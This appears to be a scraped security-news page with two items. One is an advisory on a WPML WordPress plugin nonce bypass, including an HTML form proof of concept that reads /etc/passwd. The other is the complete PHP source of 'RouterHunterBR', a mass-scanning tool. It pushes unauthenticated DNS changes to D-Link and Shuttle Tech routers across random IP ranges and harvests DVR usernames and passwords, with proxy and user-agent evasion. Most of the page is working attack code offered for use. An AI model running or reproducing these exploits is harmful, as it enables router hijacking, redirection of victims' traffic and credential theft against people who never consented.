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  1. One more vulnerability reported on March 02 and fixed in version 3.1.9: *4. Unauthenticated administrative functions* An unauthenticated attacker may under certain conditions bypass WPML's nonce check and perform administrative functions. The administrative ajax functions are protected with nonces to prevent unauthorised use. Login state is not checked. If the nonce check fails with the $_REQUEST values, there is a secondary check that also has to fail before the request is denied: > if (!( isset( $_GET[ 'icl_ajx_action' ] ) && $_GET[ 'nonce' ] == wp_create_nonce( $_GET[ 'icl_ajx_action' ] ) )) { die('Invalid nonce'); } The problem is the mixed use of $_REQUEST and $_GET. If the above check succeeds, subsequent code again uses $_REQUEST instead of $_GET to determine the ajax action to perform. If the attacker has a valid nonce generated by the target WordPress site - from any plug-in or the core system - then they can pass the above check. They can then define a different ajax action in POST parameters to perform administrative functions without authentication. An unauthenticated attacker could then execute any of the about 50 WPML ajax actions intended for administrators only. There is a lot of choice for manipulating or destroying data. For instance, it's possible to define a root html file which is evaluated as include $html_file; This would allow reading server-side files or evaluating PHP code hosted on remote sites (if allowed by PHP settings). A default WordPress installation with only WPML installed apparently doesn't generate nonces for unauthenticated users, so this is probably not exploitable unless there are other plug-ins installed. For example bbpress generates nonces for unauthenticated users. > Proof of concept: > <form method=POST action=" https://YOUR.WORDPRESS.BLOG/?icl_ajx_action=toggle-subscription_10&nonce=1234567890 "> <input type=hidden name="icl_ajx_action" value="icl_save_language_negotiation_type"> <input type=hidden name="_icl_nonce" value="(ignored)"> <input type=hidden name="icl_language_negotiation_type" value="1"> <input type=hidden name="use_directory" value="1"> <input type=hidden name="show_on_root" value="html_file"> <input type=hidden name="root_html_file_path" value="/etc/passwd"> <input type=submit> </form> In the above example, a toggle-subscription nonce generated by bbpress is used. It can be retrieved by unauthenticated users (go to a forum page, view source). On submitting the form, WPML will pass the ajax action because the bbpress nonce is valid. > The ajax action is determined from the POST parameters. In this example, WPML settings would be changed so that contents of /etc/passwd is shown as the default page on the website. This PoC was successfully tested with WPML -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi - Twitter: @klikkioy Source
  2. Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Readme: # RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP. * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ - Description: ------ The script explores three vulnerabilities in routers * 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ * 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ * 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ - Execute: ------ ``` Simple search: php RouterHunterBR.php --range '' --dns1 --dns2 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 --dns2 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 --dns2 --output result.txt Set proxy: php RouterHunterBR.php --range '' --dns1 --dns2 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@' ``` - Dependencies: ------ ``` sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ``` - EDITING TO ADD NEW EXPLOITS GETS: ------ ``` TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; #DEFINITION OF EXPLOITS line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; ``` Download: <?php/* * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/'>http://packetstormsecurity.com/user/googleinurl/ ---------------------------------------------------------- * Description:* The script explores two vulnerabilities in routers 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ ---------------------------------------------------------- * Execute* Simple search: php RouterHunterBR.php --range '' --dns1 --dns2 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 --dns2 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 --dns2 --output result.txt Set proxy: php RouterHunterBR.php --range '' --dns1 --dns2 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@' ---------------------------------------------------------- * Dependencies* sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ---------------------------------------------------------- *Update* https://github.com/googleinurl/RouterHunterBR ---------------------------------------------------------- */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); (!isset($_SESSION) ? session_start() : NULL); $_SESSION["cont_ip"] = 0; //SETANDO CORES TERMINAL $_SESSION["c00"] = "\033[0m"; // COLOR END $_SESSION["c01"] = "\033[1;37m"; // WHITE $_SESSION["c02"] = "\033[1;33m"; // YELLOW $_SESSION["c13"] = "\033[02;31m"; // DARK RED $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT $_SESSION["c07"] = "\033[1;30m"; // DARK GREY $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::')); //VERIFYING LIB php5-curl IS INSTALLED. (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL ); (!defined('STDIN') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL); empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL; (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL); #=============================================================================== ########################## CONFIGURATION SCRITPT ############################### #=============================================================================== $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL; $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL; /* TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; */ #DEFINITION OF EXPLOITS $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '' --dns2 ''{$_SESSION["c00"]}\n") : NULL; $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n"); $params['file'] = not_isnull_empty($command['file']) ? __getIPFile($command['file']) : NULL; $params['rand'] = isset($command['rand']) ? TRUE : NULL; $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL; $params['proxy'] = not_isnull_empty($command['proxy']) ? $command['proxy'] : NULL; $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL; $params['op'] = NULL; $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op']; $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op']; $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op']; $params['line'] = "-------------------------------------------------------------\n"; #=============================================================================== function __plus() { ob_flush(); flush(); } //FILTRE USER PASS LG_DVR_LE6016D function __getUserPass($html) { $set = array(); $set['reg1'] = '/<name>(.*?)<\/name>/i'; $set['reg2'] = '/<pw>(.*?)<\/pw>/i'; if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { preg_match_all($set['reg1'], $html, $set['user']); preg_match_all($set['reg2'], $html, $set['pass']); for ($i = 0; $i <= count($set['user']); $i++) { $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; } return $set['out']; } return FALSE; } //INFORMATION IP function __infoIP($ip) { __plus(); $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; } //VALIDATION VARIABLE function not_isnull_empty($value = NULL) { RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '' --dns1 --dns2 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 --dns2 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 --dns2 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '' --dns1 --dns2 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source
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